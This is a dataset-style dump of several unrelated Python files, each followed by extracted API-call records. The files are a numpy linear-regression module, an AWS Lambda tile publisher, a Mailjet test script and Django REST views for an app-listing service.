] | [((2352, 2527), 'itsdangerous.TimedJSONWebSignatureSerializer', 'TimedJSONWebSignatureSerializer', (['settings.jwt.refresh_token.secret'], {'expires_in': 'settings.jwt.refresh_token.max_age', 'algorithm_name': 'settings.jwt.refresh_token.algorithm'}), '(settings.jwt.refresh_token.secret,\n expires_in=settings.jwt.refresh_token.max_age, algorithm_name=settings.\n jwt.refresh_token.algorithm)\n', (2383, 2527), False, 'from itsdangerous import TimedJSONWebSignatureSerializer, JSONWebSignatureSerializer\n'), ((384, 469), 'itsdangerous.JSONWebSignatureSerializer', 'JSONWebSignatureSerializer', (["config['secret']"], {'algorithm_name': "config['algorithm']"}), "(config['secret'], algorithm_name=config['algorithm']\n )\n", (410, 469), False, 'from itsdangerous import TimedJSONWebSignatureSerializer, JSONWebSignatureSerializer\n'), ((544, 674), 'itsdangerous.TimedJSONWebSignatureSerializer', 'TimedJSONWebSignatureSerializer', (["config['secret']"], {'expires_in': "(max_age or config['max_age'])", 'algorithm_name': "config['algorithm']"}), "(config['secret'], expires_in=max_age or\n config['max_age'], algorithm_name=config['algorithm'])\n", (575, 674), False, 'from itsdangerous import TimedJSONWebSignatureSerializer, JSONWebSignatureSerializer\n'), ((1577, 1592), 'nanohttp.HTTPForbidden', 'HTTPForbidden', ([], {}), '()\n', (1590, 1592), False, 'from nanohttp import settings, context, HTTPForbidden\n')] |
import numpy as np
import matplotlib.pyplot as plt
import math
TIME_SLEEP = 0.000000001
def train_sgd(X, y, alpha, w=None):
"""Trains a linear regression model using stochastic gradient descent.
Parameters
----------
X : numpy.ndarray
Numpy array of data
y : numpy.ndarray
Numpy array of outputs. Dimensions are n * 1, where n is the number of rows
in `X`.
alpha : float
Describes the learning rate.
w : numpy.ndarray, optional
The initial w vector (the default is zero).
Returns
-------
w : numpy.ndarray
Trained vector with dimensions (m + 1) * 1, where m is the number of
columns in `X`.
"""
X_b = np.hstack((np.ones((X.shape[0], 1)), X))
previous_error = -1
error = -1
stop = False
num_iters = 0
if w is None:
w = np.zeros((x.shape[1] + 1, 1))
while not stop:
for i in range(0, len(X)):
w = w - alpha / len(X) * (np.dot(np.transpose(w),
X_b[i].reshape(X_b.shape[1], 1)) -
y[i]) * X_b[i].reshape(X_b.shape[1], 1)
error = evaluate_error(X, y, w)
if previous_error == -1:
previous_error = error
elif (math.fabs(error - previous_error) < 0.01 * previous_error and
num_iters > 10000):
stop = True
break
previous_error = error
num_iters += 1
return w
def train(X, y):
"""Trains a linear regression model using linear algebra.
Parameters
----------
X : numpy.ndarray
Numpy array of data
y : numpy.ndarray
Numpy array of outputs. Dimensions are n * 1, where n is the number of rows
in `X`.
Returns
-------
w : numpy.ndarray
Trained vector with dimensions (m + 1) * 1, where m is the number of
columns in `X`.
"""
# Add bias term
X_b = np.hstack((np.ones((X.shape[0], 1)), X))
# Compute pseudo-inverse
X_inverse = (np.linalg.inv(np.transpose(X_b).dot(X_b)).dot(
np.transpose(X_b)))
# Compute w
w = X_inverse.dot(y)
return w
# Plot data
def plot(X, y, w):
"""Plot X data, the actual y output, and the prediction line.
Parameters
----------
X : numpy.ndarray
Numpy array of data with 1 column.
y : numpy.ndarray
Numpy array of outputs. Dimensions are n * 1, where n is the number of
rows in `X`.
w : numpy.ndarray
Numpy array with dimensions 2 * 1.
"""
X_b = np.hstack((np.ones((X.shape[0], 1)), X))
y_predict = X_b.dot(w)
plt.clf()
plt.plot(X[:, 0], y_predict, 'r-', X[:, 0], y, 'o')
plt.pause(TIME_SLEEP)
def init_plot(figsize=(15, 8)):
"""Initializes the plot.
Parameters
----------
figsize : tuple, optional
A tuple containing the width and height of the plot (the default is
(15, 8)).
"""
plt.ion()
f = plt.figure(figsize=figsize)
plt.show()
def evaluate_error(X, y, w):
"""Returns the mean squared error.
X : numpy.ndarray
Numpy array of data.
y : numpy.ndarray
Numpy array of outputs. Dimensions are n * 1, where n is the number of
rows in `X`.
w : numpy.ndarray
Numpy array with dimensions (m + 1) * 1, where m is the number of
columns in `X`.
Returns
-------
float
The mean squared error
"""
X_b = np.hstack((np.ones((X.shape[0], 1)), X))
y_predict = X_b.dot(w)
dist = (y - y_predict) ** 2
return float(np.sum(dist)) / X.shape[0]
def predict(X, w):
"""Returns the prediction for one data point.
Parameters
----------
X : numpy.ndarray
Numpy array of data
w : numpy.ndarray
Numpy array with dimensions (m + 1) * 1, where m is the number of
columns in `X`.
Returns
-------
float
The mean squared error
"""
X_b = np.hstack((np.ones((X.shape[0], 1)), X))
return X_b.dot(w)
| [
"numpy.ones",
"matplotlib.pyplot.show",
"matplotlib.pyplot.clf",
"matplotlib.pyplot.plot",
"numpy.sum",
"matplotlib.pyplot.figure",
"numpy.zeros",
"math.fabs",
"matplotlib.pyplot.pause",
"numpy.transpose",
"matplotlib.pyplot.ion"
] | [((2701, 2710), 'matplotlib.pyplot.clf', 'plt.clf', ([], {}), '()\n', (2708, 2710), True, 'import matplotlib.pyplot as plt\n'), ((2715, 2766), 'matplotlib.pyplot.plot', 'plt.plot', (['X[:, 0]', 'y_predict', '"""r-"""', 'X[:, 0]', 'y', '"""o"""'], {}), "(X[:, 0], y_predict, 'r-', X[:, 0], y, 'o')\n", (2723, 2766), True, 'import matplotlib.pyplot as plt\n'), ((2771, 2792), 'matplotlib.pyplot.pause', 'plt.pause', (['TIME_SLEEP'], {}), '(TIME_SLEEP)\n', (2780, 2792), True, 'import matplotlib.pyplot as plt\n'), ((3024, 3033), 'matplotlib.pyplot.ion', 'plt.ion', ([], {}), '()\n', (3031, 3033), True, 'import matplotlib.pyplot as plt\n'), ((3042, 3069), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': 'figsize'}), '(figsize=figsize)\n', (3052, 3069), True, 'import matplotlib.pyplot as plt\n'), ((3074, 3084), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (3082, 3084), True, 'import matplotlib.pyplot as plt\n'), ((860, 889), 'numpy.zeros', 'np.zeros', (['(x.shape[1] + 1, 1)'], {}), '((x.shape[1] + 1, 1))\n', (868, 889), True, 'import numpy as np\n'), ((2149, 2166), 'numpy.transpose', 'np.transpose', (['X_b'], {}), '(X_b)\n', (2161, 2166), True, 'import numpy as np\n'), ((723, 747), 'numpy.ones', 'np.ones', (['(X.shape[0], 1)'], {}), '((X.shape[0], 1))\n', (730, 747), True, 'import numpy as np\n'), ((2008, 2032), 'numpy.ones', 'np.ones', (['(X.shape[0], 1)'], {}), '((X.shape[0], 1))\n', (2015, 2032), True, 'import numpy as np\n'), ((2638, 2662), 'numpy.ones', 'np.ones', (['(X.shape[0], 1)'], {}), '((X.shape[0], 1))\n', (2645, 2662), True, 'import numpy as np\n'), ((3546, 3570), 'numpy.ones', 'np.ones', (['(X.shape[0], 1)'], {}), '((X.shape[0], 1))\n', (3553, 3570), True, 'import numpy as np\n'), ((3653, 3665), 'numpy.sum', 'np.sum', (['dist'], {}), '(dist)\n', (3659, 3665), True, 'import numpy as np\n'), ((4048, 4072), 'numpy.ones', 'np.ones', (['(X.shape[0], 1)'], {}), '((X.shape[0], 1))\n', (4055, 4072), True, 'import numpy as np\n'), ((1298, 1331), 'math.fabs', 'math.fabs', (['(error - previous_error)'], {}), '(error - previous_error)\n', (1307, 1331), False, 'import math\n'), ((2099, 2116), 'numpy.transpose', 'np.transpose', (['X_b'], {}), '(X_b)\n', (2111, 2116), True, 'import numpy as np\n'), ((991, 1006), 'numpy.transpose', 'np.transpose', (['w'], {}), '(w)\n', (1003, 1006), True, 'import numpy as np\n')] |
import boto3
import json
import math
import logging
import base64
from concurrent.futures import ThreadPoolExecutor
from .storyhtml import create_story_html
from .convert import convert_to_exhibit
import time
class StoryPublisher:
def __init__(
self,
bucket,
get_image_lambda_name,
render_tile_lambda_name,
render_group_lambda_name,
):
self.bucket = bucket
self.lambda_client = boto3.client("lambda")
self.s3_client = boto3.client("s3")
self.get_image_lambda_name = get_image_lambda_name
self.render_tile_lambda_name = render_tile_lambda_name
self.render_group_lambda_name = render_group_lambda_name
self.metadata = None
self.image = None
def publish(self, story, user_uuid, minerva_browser_url, render_images=True):
logging.info(
"Publishing story uuid=%s render_images=%s", story["uuid"], render_images
)
self._load_image(user_uuid, story["imageUuid"])
self._create_story(story, minerva_browser_url)
if render_images:
self._render_tiles(story, user_uuid)
def get_published_status(self, story_uuid):
res = self.s3_client.list_objects(Bucket=self.bucket, Prefix=story_uuid)
if "Contents" not in res:
return "unpublished"
res = self.s3_client.list_objects(
Bucket=self.bucket, Prefix=f"{story_uuid}/log"
)
if "Contents" in res:
for item in res["Contents"]:
if "SUCCESS" in item["Key"]:
return "published"
if "FAILURE" in item["Key"]:
return "failure"
return "processing"
def _load_image(self, user_uuid, image_uuid):
body = self._get_image(user_uuid, image_uuid)
self.metadata = body["data"]
self.image = body["included"]["images"][0]
def _create_story(self, story, minerva_browser_url):
print("Creating story")
story_uuid = story["uuid"]
img = {
"width": self.metadata["pixels"]["SizeX"],
"height": self.metadata["pixels"]["SizeY"],
"pyramid_levels": self.image["pyramid_levels"],
}
story_json = json.dumps(convert_to_exhibit(story, img, self.bucket))
html = create_story_html(story_json, minerva_browser_url)
key = f"{story_uuid}/minerva-story/index.html"
self.s3_client.put_object(
Body=html, Bucket=self.bucket, Key=key, ContentType="text/html"
)
try:
key = f"{story_uuid}/minerva-story/favicon.png"
self.s3_client.upload_file(
"images/favicon.png", Bucket=self.bucket, Key=key
)
except Exception as e:
print(e)
def _render_tiles(self, story, user_uuid):
print("Rendering tiles")
img = {
"uuid": story["imageUuid"],
"width": self.metadata["pixels"]["SizeX"],
"height": self.metadata["pixels"]["SizeY"],
"pyramid_levels": self.image["pyramid_levels"],
"tile_size": self.image["tile_size"],
}
# Maximum timeout for lambda is 15min. To prevent rendering from timeouting,
# we execute each group in a separate lambda run.
for group in story["groups"]:
self._start_render_lambda(
group, img, user_uuid, story["sample_info"]["name"], story["uuid"]
)
def _start_render_lambda(self, group, img, user_uuid, sample_name, story_uuid):
payload = {
"group": group,
"image": img,
"user_uuid": user_uuid,
"sample_name": sample_name,
"story_uuid": story_uuid,
}
res = self.lambda_client.invoke(
FunctionName=self.render_group_lambda_name,
InvocationType="Event",
Payload=json.dumps(payload),
)
if res["StatusCode"] not in [200, 202, 204]:
print(res)
raise Exception("Error in invoking lambda publishGroupInternal")
def render_group(self, context, group, image, user_uuid, sample_name, story_uuid):
start_time = time.time()
num_tiles = 0
channels = group["channels"]
channel_params = [
f"{channel['id']},{channel['color']},{channel['min']},{channel['max']}"
for channel in channels
]
channel_params = "/".join(channel_params)
group_label = group["label"]
channel_labels = [
f"{channel['id']}__{channel['label']}" for channel in channels
]
channel_labels = "--".join(channel_labels)
group_key = f"{group_label}_{channel_labels}"
group_key = group_key.replace(" ", "-")
logging.info("Rendering channel group %s", group_key)
tiles_x = math.ceil(image["width"] / image["tile_size"])
tiles_y = math.ceil(image["height"] / image["tile_size"])
executor = ThreadPoolExecutor(max_workers=15)
pyramid = []
for number in range(image["pyramid_levels"]):
pyramid.append({"tiles_x": tiles_x, "tiles_y": tiles_y, "number": number})
tiles_x = math.ceil(tiles_x / 2)
tiles_y = math.ceil(tiles_y / 2)
# Render highest pyramid levels (lowest detail) first, in that way the user can
# open the story faster and see the image.
for level in reversed(pyramid):
logging.info("Level %s", level["number"])
for x in range(level["tiles_x"]):
for y in range(level["tiles_y"]):
num_tiles += 1
executor.submit(
self._render_and_upload,
user_uuid,
image["uuid"],
x,
y,
0,
0,
level["number"],
channel_params,
story_uuid,
group_key,
sample_name,
)
if context.get_remaining_time_in_millis() < 1000:
run_time = time.time() - start_time
self._mark_group_success(
False, story_uuid, group["label"], run_time, num_tiles
)
executor.shutdown()
run_time = time.time() - start_time
self._mark_group_success(True, story_uuid, group["label"], run_time, num_tiles)
def _render_and_upload(
self,
user_uuid,
image_uuid,
x,
y,
z,
t,
level,
channel_params,
story_uuid,
group_label,
sample_name,
):
logging.info("x=%s y=%s ", x, y)
tile_img = self._render_tile(
user_uuid, image_uuid, x, y, z, t, level, channel_params
)
key = f"{story_uuid}/minerva-story/images/{sample_name}/{group_label}/{level}_{x}_{y}.jpg"
self.s3_client.put_object(Body=tile_img, Bucket=self.bucket, Key=key)
def _mark_group_success(self, success, story_uuid, group_name, run_time, num_tiles):
status = "SUCCESS" if success else "FAILURE"
key = f"{story_uuid}/log/publishGroupInternal_{status}_{group_name}.json"
marker = {
"group": group_name,
"success": success,
"duration": run_time,
"tiles": num_tiles,
}
self.s3_client.put_object(Body=json.dumps(marker), Bucket=self.bucket, Key=key)
def _get_image(self, user_uuid, image_uuid):
payload = {
"pathParameters": {"uuid": image_uuid},
"requestContext": {
"authorizer": {"claims": {"cognito:username": user_uuid}}
},
"headers": {"Accept": "image/jpeg"},
}
res = self.lambda_client.invoke(
FunctionName=self.get_image_lambda_name, Payload=json.dumps(payload)
)
data = json.loads(res["Payload"].read())
body = json.loads(data["body"])
return body
def _render_tile(self, user_uuid, uuid, x, y, z, t, level, channels):
payload = {
"pathParameters": {
"uuid": uuid,
"x": x,
"y": y,
"z": z,
"t": t,
"level": level,
"channels": channels,
},
"queryStringParameters": {"gamma": "1"},
"requestContext": {
"authorizer": {"claims": {"cognito:username": user_uuid}}
},
"headers": {"Accept": "image/jpeg"},
}
res = self.lambda_client.invoke(
FunctionName=self.render_tile_lambda_name, Payload=json.dumps(payload)
)
data = res["Payload"].read()
body = json.loads(data)["body"]
return base64.b64decode(body)
| [
"json.loads",
"math.ceil",
"boto3.client",
"concurrent.futures.ThreadPoolExecutor",
"json.dumps",
"base64.b64decode",
"time.time",
"logging.info"
] | [((444, 466), 'boto3.client', 'boto3.client', (['"""lambda"""'], {}), "('lambda')\n", (456, 466), False, 'import boto3\n'), ((492, 510), 'boto3.client', 'boto3.client', (['"""s3"""'], {}), "('s3')\n", (504, 510), False, 'import boto3\n'), ((844, 935), 'logging.info', 'logging.info', (['"""Publishing story uuid=%s render_images=%s"""', "story['uuid']", 'render_images'], {}), "('Publishing story uuid=%s render_images=%s', story['uuid'],\n render_images)\n", (856, 935), False, 'import logging\n'), ((4213, 4224), 'time.time', 'time.time', ([], {}), '()\n', (4222, 4224), False, 'import time\n'), ((4803, 4856), 'logging.info', 'logging.info', (['"""Rendering channel group %s"""', 'group_key'], {}), "('Rendering channel group %s', group_key)\n", (4815, 4856), False, 'import logging\n'), ((4875, 4921), 'math.ceil', 'math.ceil', (["(image['width'] / image['tile_size'])"], {}), "(image['width'] / image['tile_size'])\n", (4884, 4921), False, 'import math\n'), ((4940, 4987), 'math.ceil', 'math.ceil', (["(image['height'] / image['tile_size'])"], {}), "(image['height'] / image['tile_size'])\n", (4949, 4987), False, 'import math\n'), ((5008, 5042), 'concurrent.futures.ThreadPoolExecutor', 'ThreadPoolExecutor', ([], {'max_workers': '(15)'}), '(max_workers=15)\n', (5026, 5042), False, 'from concurrent.futures import ThreadPoolExecutor\n'), ((6832, 6864), 'logging.info', 'logging.info', (['"""x=%s y=%s """', 'x', 'y'], {}), "('x=%s y=%s ', x, y)\n", (6844, 6864), False, 'import logging\n'), ((8130, 8154), 'json.loads', 'json.loads', (["data['body']"], {}), "(data['body'])\n", (8140, 8154), False, 'import json\n'), ((8972, 8994), 'base64.b64decode', 'base64.b64decode', (['body'], {}), '(body)\n', (8988, 8994), False, 'import base64\n'), ((5227, 5249), 'math.ceil', 'math.ceil', (['(tiles_x / 2)'], {}), '(tiles_x / 2)\n', (5236, 5249), False, 'import math\n'), ((5272, 5294), 'math.ceil', 'math.ceil', (['(tiles_y / 2)'], {}), '(tiles_y / 2)\n', (5281, 5294), False, 'import math\n'), ((5487, 5528), 'logging.info', 'logging.info', (['"""Level %s"""', "level['number']"], {}), "('Level %s', level['number'])\n", (5499, 5528), False, 'import logging\n'), ((6477, 6488), 'time.time', 'time.time', ([], {}), '()\n', (6486, 6488), False, 'import time\n'), ((8932, 8948), 'json.loads', 'json.loads', (['data'], {}), '(data)\n', (8942, 8948), False, 'import json\n'), ((3920, 3939), 'json.dumps', 'json.dumps', (['payload'], {}), '(payload)\n', (3930, 3939), False, 'import json\n'), ((7583, 7601), 'json.dumps', 'json.dumps', (['marker'], {}), '(marker)\n', (7593, 7601), False, 'import json\n'), ((8036, 8055), 'json.dumps', 'json.dumps', (['payload'], {}), '(payload)\n', (8046, 8055), False, 'import json\n'), ((8850, 8869), 'json.dumps', 'json.dumps', (['payload'], {}), '(payload)\n', (8860, 8869), False, 'import json\n'), ((6245, 6256), 'time.time', 'time.time', ([], {}), '()\n', (6254, 6256), False, 'import time\n')] |
from setuptools import setup
from Cython.Build import cythonize
setup(ext_modules=cythonize('bfsHash.pyx')) | [
"Cython.Build.cythonize"
] | [((83, 107), 'Cython.Build.cythonize', 'cythonize', (['"""bfsHash.pyx"""'], {}), "('bfsHash.pyx')\n", (92, 107), False, 'from Cython.Build import cythonize\n')] |
import os
import sys
sys.path.append("../instock_notifier")
import config
from mailjet_rest import Client
mailjet = Client(auth=(config.SMTP_API_KEY, config.SMTP_API_SECRET), version="v3.1")
data = {
"Messages": [
{
"From": config.EMAIL_SENDER,
"To": config.EMAIL_RECIPIENTS,
"Subject": "Greetings from Mailjet.",
"TextPart": "My first Mailjet email",
"HTMLPart": "<h3>Dear passenger 1, welcome to <a href='https://www.mailjet.com/'>Mailjet</a>!</h3><br />May the delivery force be with you!",
"CustomID": "AppGettingStartedTest"
}
]
}
result = mailjet.send.create(data=data)
print(result.status_code)
print(result.json()) | [
"mailjet_rest.Client",
"sys.path.append"
] | [((23, 61), 'sys.path.append', 'sys.path.append', (['"""../instock_notifier"""'], {}), "('../instock_notifier')\n", (38, 61), False, 'import sys\n'), ((127, 201), 'mailjet_rest.Client', 'Client', ([], {'auth': '(config.SMTP_API_KEY, config.SMTP_API_SECRET)', 'version': '"""v3.1"""'}), "(auth=(config.SMTP_API_KEY, config.SMTP_API_SECRET), version='v3.1')\n", (133, 201), False, 'from mailjet_rest import Client\n')] |
"""
Listing Views
"""
import logging
import operator
from django.shortcuts import get_object_or_404
from django.db.models import Min
from django.db.models.functions import Lower
from rest_framework import filters
from rest_framework import status
from rest_framework import viewsets
from rest_framework.response import Response
from rest_framework.decorators import list_route
from ozpcenter import errors
from ozpcenter import pagination
from ozpcenter import permissions
from ozpcenter.pipe import pipes
from ozpcenter.pipe import pipeline
from ozpcenter.recommend import recommend_utils
import ozpcenter.api.listing.model_access as model_access
import ozpcenter.api.listing.serializers as serializers
import ozpcenter.model_access as generic_model_access
import ozpcenter.api.listing.model_access_es as model_access_es
logger = logging.getLogger('ozp-center.' + str(__name__))
class DocUrlViewSet(viewsets.ModelViewSet):
"""
TODO: Remove?
"""
permission_classes = (permissions.IsUser,)
queryset = model_access.get_all_doc_urls()
serializer_class = serializers.DocUrlSerializer
class ReviewViewSet(viewsets.ModelViewSet):
"""
Reviews for a given listing
The unique_together contraints on models.Review make it difficult to
use the standard Serializer classes (see the Note here:
http://www.django-rest-framework.org/api-guide/serializers/#specifying-read-only-fields)
Primarily for that reason, we forgo using Serializers for POST and PUT
actions
ModelViewSet for getting all Reviews for a given listing
Access Control
===============
- All users can view
URIs
======
GET /api/listing/{pk}/review
Summary:
Find a Review Entry by ID
Response:
200 - Successful operation - ReviewSerializer
DELETE /api/listing/{pk}/review
Summary:
Delete a Review Entry by ID
"""
permission_classes = (permissions.IsUser,)
serializer_class = serializers.ReviewSerializer
filter_backends = (filters.OrderingFilter,)
pagination_class = pagination.ReviewLimitOffsetPagination
ordering_fields = ('id', 'listing', 'text', 'rate', 'edited_date', 'created_date')
ordering = ('-created_date')
def get_queryset(self):
return model_access.get_reviews(self.request.user.username)
def list(self, request, listing_pk=None):
queryset = self.get_queryset().filter(listing=listing_pk, review_parent__isnull=True)
queryset = self.filter_queryset(queryset)
# it appears that because we override the queryset here, we must
# manually invoke the pagination methods
page = self.paginate_queryset(queryset)
if page is not None:
serializer = serializers.ReviewSerializer(page, context={'request': request}, many=True)
return self.get_paginated_response(serializer.data)
serializer = serializers.ReviewSerializer(queryset, many=True, context={'request': request})
return Response(serializer.data)
def retrieve(self, request, pk=None, listing_pk=None):
queryset = self.get_queryset().get(pk=pk, listing=listing_pk)
serializer = serializers.ReviewSerializer(queryset, context={'request': request})
return Response(serializer.data)
def create(self, request, listing_pk=None):
"""
Create a new review
"""
listing = model_access.get_listing_by_id(request.user.username, listing_pk, True)
serializer = serializers.ReviewSerializer(data=request.data, context={'request': request, 'listing': listing}, partial=True)
if not serializer.is_valid():
logger.error('{0!s}'.format(serializer.errors), extra={'request': request})
raise errors.ValidationException('{0}'.format(serializer.errors))
serializer.save()
return Response(serializer.data, status=status.HTTP_201_CREATED)
def update(self, request, pk=None, listing_pk=None):
"""
Update an existing review
"""
listing = model_access.get_listing_by_id(request.user.username, listing_pk, True)
review = model_access.get_review_by_id(pk)
serializer = serializers.ReviewSerializer(review, data=request.data, context={'request': request, 'listing': listing}, partial=True)
if not serializer.is_valid():
logger.error('{0!s}'.format(serializer.errors), extra={'request': request})
raise errors.ValidationException('{0}'.format(serializer.errors))
serializer.save()
return Response(serializer.data, status=status.HTTP_200_OK)
def destroy(self, request, pk=None, listing_pk=None):
queryset = self.get_queryset()
review = get_object_or_404(queryset, pk=pk)
model_access.delete_listing_review(request.user.username, review)
return Response(status=status.HTTP_204_NO_CONTENT)
class SimilarViewSet(viewsets.ModelViewSet):
"""
Similar Apps for a given listing
# TODO (Rivera 2017-2-22) Implement Similar Listing Algorithm
Primarily for that reason, we forgo using Serializers for POST and PUT
actions
ModelViewSet for getting all Similar Apps for a given listing
Access Control
===============
- All users can view
URIs
======
GET /api/listing/{pk}/similar
Summary:
Find a Similar App Entry by ID
Response:
200 - Successful operation - ListingSerializer
"""
permission_classes = (permissions.IsUser,)
serializer_class = serializers.ListingSerializer
# pagination_class = pagination.StandardPagination
def get_queryset(self, listing_pk):
approval_status = self.request.query_params.get('approval_status', None)
# org = self.request.query_params.get('org', None)
orgs = self.request.query_params.getlist('org', False)
enabled = self.request.query_params.get('enabled', None)
ordering = self.request.query_params.getlist('ordering', None)
if enabled:
enabled = enabled.lower()
if enabled in ['true', '1']:
enabled = True
else:
enabled = False
listings = model_access.get_similar_listings(self.request.user.username, listing_pk)
if approval_status:
listings = listings.filter(approval_status=approval_status)
if orgs:
listings = listings.filter(agency__title__in=orgs)
if enabled is not None:
listings = listings.filter(is_enabled=enabled)
# have to handle this case manually because the ordering includes an app multiple times
# if there are multiple owners. We instead do sorting by case insensitive compare of the
# app owner that comes first alphabetically
param = [s for s in ordering if 'owners__display_name' == s or '-owners__display_name' == s]
if ordering is not None and param:
orderby = 'min'
if param[0].startswith('-'):
orderby = '-min'
listings = listings.annotate(min=Min(Lower('owners__display_name'))).order_by(orderby)
self.ordering = None
return listings
def list(self, request, listing_pk=None):
queryset = self.filter_queryset(self.get_queryset(listing_pk))
serializer = serializers.ListingSerializer(queryset, context={'request': request}, many=True)
similar_listings = pipeline.Pipeline(recommend_utils.ListIterator(serializer.data),
[pipes.ListingDictPostSecurityMarkingCheckPipe(self.request.user.username),
pipes.LimitPipe(10)]).to_list()
return Response(similar_listings)
class RecommendationFeedbackViewSet(viewsets.ModelViewSet):
"""
Recommendation Feedback for a given listing
Access Control
===============
- All users can view
URIs
======
GET /api/listing/{pk}/feedback
Summary:
Find a feedback Entry by ID
Response:
200 - Successful operation - ListingSerializer
"""
permission_classes = (permissions.IsUser,)
serializer_class = serializers.RecommendationFeedbackSerializer
# pagination_class = pagination.StandardPagination
def get_queryset(self, listing):
recommendation_feedback_query = model_access.get_recommendation_feedback(self.request.user.username, listing)
return recommendation_feedback_query
def list(self, request, listing_pk=None):
listing = model_access.get_listing_by_id(request.user.username, listing_pk, True)
queryset = self.get_queryset(listing)
if not queryset:
return Response({'feedback': 0}, status=status.HTTP_404_NOT_FOUND)
serializer = serializers.RecommendationFeedbackSerializer(queryset, context={'request': request, 'listing': listing})
data = serializer.data
return Response(data)
def create(self, request, listing_pk=None):
listing = model_access.get_listing_by_id(request.user.username, listing_pk, True)
serializer = serializers.RecommendationFeedbackSerializer(data=request.data, context={'request': request, 'listing': listing})
if not serializer.is_valid():
logger.error('{0!s}'.format(serializer.errors), extra={'request': request})
raise errors.ValidationException('{0}'.format(serializer.errors))
serializer.save()
return Response(serializer.data, status=status.HTTP_201_CREATED)
def destroy(self, request, listing_pk=None, pk=None):
listing = model_access.get_listing_by_id(request.user.username, listing_pk, True)
feedback = model_access.get_recommendation_feedback(request.user.username, listing)
if feedback is None:
return Response(status=status.HTTP_404_NOT_FOUND)
model_access.delete_recommendation_feedback(listing, feedback)
return Response(status=status.HTTP_204_NO_CONTENT)
class ListingTypeViewSet(viewsets.ModelViewSet):
"""
Listing Types
ModelViewSet for getting all Listing Types for a given listing
Access Control
===============
- All users can view
URIs
======
GET /api/listingtype
Summary:
Get a list of all system-wide ListingType entries
Response:
200 - Successful operation - [ListingTypeSerializer]
POST /api/listingtype
Summary:
Add a ListingType
Request:
data: ListingTypeSerializer Schema
Response:
200 - Successful operation - ListingTypeSerializer
GET /api/listingtype/{pk}
Summary:
Find a ListingType Entry by ID
Response:
200 - Successful operation - ListingTypeSerializer
PUT /api/listingtype/{pk}
Summary:
Update a ListingType Entry by ID
PATCH /api/listingtype/{pk}
Summary:
Update (Partial) a ListingType Entry by ID
DELETE /api/listingtype/{pk}
Summary:
Delete a ListingType Entry by ID
"""
permission_classes = (permissions.IsUser,)
queryset = model_access.get_all_listing_types()
serializer_class = serializers.ListingTypeSerializer
class ListingUserActivitiesViewSet(viewsets.ModelViewSet):
"""
ListingUserActivitiesViewSet endpoints are read-only
ModelViewSet for getting all Listing User Activities for a given listing
Access Control
===============
- All users can view
URIs
======
GET /api/self/listings/activity
Summary:
Get a list of all system-wide ListingUserActivities entries
Response:
200 - Successful operation - [ListingActivitySerializer]
GET /api/self/listings/activity/{pk}
Summary:
Find a Listing User Activity Entry by ID
Response:
200 - Successful operation - ListingActivitySerializer
"""
permission_classes = (permissions.IsUser,)
serializer_class = serializers.ListingActivitySerializer
def get_queryset(self):
return model_access.get_listing_activities_for_user(
self.request.user.username)
def list(self, request):
queryset = self.get_queryset()
page = self.paginate_queryset(queryset)
if page is not None:
serializer = serializers.ListingActivitySerializer(page,
context={'request': request}, many=True)
return self.get_paginated_response(serializer.data)
serializer = serializers.ListingActivitySerializer(queryset,
context={'request': request}, many=True)
return Response(serializer.data)
class ListingActivitiesViewSet(viewsets.ModelViewSet):
"""
ListingActivity endpoints are read-only
ModelViewSet for getting all Listing Activities for a given listing
Access Control
===============
- AppsMallSteward can view
URIs
======
GET /api/listings/activity
Summary:
Get a list of all system-wide ListingActivities entries
Response:
200 - Successful operation - [ListingActivitySerializer]
GET /api/listings/activity/{pk}
Summary:
Find a Listing User Activity Entry by ID
Response:
200 - Successful operation - ListingActivitySerializer
"""
permission_classes = (permissions.IsOrgSteward,)
serializer_class = serializers.ListingActivitySerializer
def get_queryset(self):
return model_access.get_all_listing_activities(
self.request.user.username).order_by('-activity_date')
def list(self, request):
queryset = self.get_queryset()
# it appears that because we override the queryset here, we must
# manually invoke the pagination methods
page = self.paginate_queryset(queryset)
if page is not None:
serializer = serializers.ListingActivitySerializer(page,
context={'request': request}, many=True)
return self.get_paginated_response(serializer.data)
serializer = serializers.ListingActivitySerializer(queryset,
context={'request': request}, many=True)
return Response(serializer.data)
class ListingActivityViewSet(viewsets.ModelViewSet):
"""
ListingActivity endpoints are read-only
ModelViewSet for getting all Listing Activities for a given listing
Access Control
===============
- All users can view
URIs
======
GET /api/listing/{pk}/activity
Summary:
Find a Listing Activity Entry by ID
Response:
200 - Successful operation - ListingActivitySerializer
"""
permission_classes = (permissions.IsUser,)
serializer_class = serializers.ListingActivitySerializer
def get_queryset(self):
return model_access.get_all_listing_activities(
self.request.user.username).order_by('-activity_date')
def list(self, request, listing_pk=None):
queryset = self.get_queryset().filter(listing=listing_pk)
# it appears that because we override the queryset here, we must
# manually invoke the pagination methods
page = self.paginate_queryset(queryset)
if page is not None:
serializer = serializers.ListingActivitySerializer(page,
context={'request': request}, many=True)
return self.get_paginated_response(serializer.data)
serializer = serializers.ListingActivitySerializer(queryset,
context={'request': request}, many=True)
return Response(serializer.data)
def retrieve(self, request, pk=None, listing_pk=None):
queryset = self.get_queryset().get(pk=pk, listing=listing_pk)
serializer = serializers.ListingActivitySerializer(queryset,
context={'request': request})
return Response(serializer.data)
class ListingPendingDeletionViewSet(viewsets.ModelViewSet):
"""
ModelViewSet for getting all Listing Pending Deletions
Access Control
===============
- All users can view
URIs
======
POST /api/listing/{pk}/pendingdeletion
Summary:
Add a ListingPendingDeletion
Request:
data: ListingPendingDeletionSerializer Schema
Response:
200 - Successful operation - ListingActivitySerializer
GET /api/listing/{pk}/pendingdeletion
Summary:
Find a ListingPendingDeletion Entry by ID
Response:
200 - Successful operation - ListingActivitySerializer
"""
permission_classes = (permissions.IsUser,)
serializer_class = serializers.ListingActivitySerializer
def get_queryset(self):
queryset = model_access.get_pending_deletion_listings(
self.request.user.username)
return queryset
def list(self, request, listing_pk=None):
queryset = self.get_queryset().filter(listing__id=listing_pk)
serializer = serializers.ListingActivitySerializer(queryset,
context={'request': request}, many=True)
return Response(serializer.data)
def create(self, request, listing_pk=None):
try:
user = generic_model_access.get_profile(request.user.username)
listing = model_access.get_listing_by_id(request.user.username,
listing_pk)
description = request.data['description'] if 'description' in request.data else None
if not description:
raise errors.InvalidInput('Description is required when pending a listing for deletion')
listing = model_access.pending_delete_listing(user, listing, description)
return Response(data={"listing": {"id": listing.id}},
status=status.HTTP_201_CREATED)
except Exception as e:
logger.error('Exception: {}'.format(e), extra={'request': request})
